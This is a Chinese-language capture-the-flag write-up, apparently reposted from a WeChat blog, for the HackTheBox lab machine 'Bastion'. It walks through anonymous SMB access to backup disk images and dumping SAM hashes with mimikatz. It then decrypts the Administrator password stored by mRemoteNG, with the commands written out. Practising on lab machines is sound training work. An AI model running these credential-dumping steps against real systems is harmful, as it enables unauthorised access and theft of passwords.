靶机信息
靶机地址:
https://app.hackthebox.com/machines/Bastion
靶场: HackTheBox.com
靶机名称: Bastion
难度: 简单
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:Windows11 10.10.16.4
靶机:10.10.10.134
信息收集
扫描端口
扫描靶机开放的服务端口
sudo nmap -p- 10.10.10.134
nmap -sC -sV -p 22,135,139,445,5985,47001,49664-49670 10.10.10.134 -oN nmap.log
扫描到多个开放端口,扫描结果中发现smb可以使用guest来宾用户访问
SMB匿名访问
验证guest是否可以访问
net use \10.10.10.134
验证成功,直接访问
\10.10.10.134
发现Backups目录,继续访问
在10.10.10.134BackupsWindowsImageBackupL4mpje-PCBackup 2019-02-22 124351’目录下发现两个虚拟磁盘文件
直接双击打开,36M的是个引导镜像,5G的是系统镜像
提取SAM和SYSTEM文件,文件位于C:windowssystem32config目录下
找到文件直接拖出来,再使用mimikatz读取密码
双击打开后在弹出的cmd下读取密码(命令中的../是上级目录,,SAM文件我存放在Bastion目录下)
lsadump::sam /sam:../../SAM /SYSTEM:../../SYSTEM
拿到Administrator和L4mpje两个用户的密码hash,
解密Administrator密码Hash解不出来
解密L4mpje密码Hash
cmd5的会员才能解密,这里感谢鹏组
拿到L4mpje的密码,尝试登录SSH
ssh [email protected]
登录成功,找找敏感信息
dir
cd desktop
dir
type user.txt
进入L4mpje用户的桌面找到user.txt,顺利拿到flag,继续找
powershell(切换到powershell,切不切都可以只是个人习惯)
cd "program files (x86)"
在program files (x86)目录下发现远程连接工具mRemoteNG来找找这个工具是否存在漏洞
发现可以解密mRemoteNG存储密码的脚本和使用教程
https://vk9-sec.com/exploiting-mremoteng/
切换到C:UsersL4mpjeAppDataRoamingmRemoteNG目录并查看密码存储文件
cd C:UsersL4mpjeAppDataRoamingmRemoteNG
ls
查看confCons.xml文件内容
type confCons.xml
拿到administrator的加密后的密码,使用脚本破解
git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
使用-s参数通过字符串方式解密
py3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
拿到Administrator密码,ssh登录
ssh [email protected]
登录成功,直接来找flag
cd desktop
type root.txt
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.113 HTB:Bastion
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论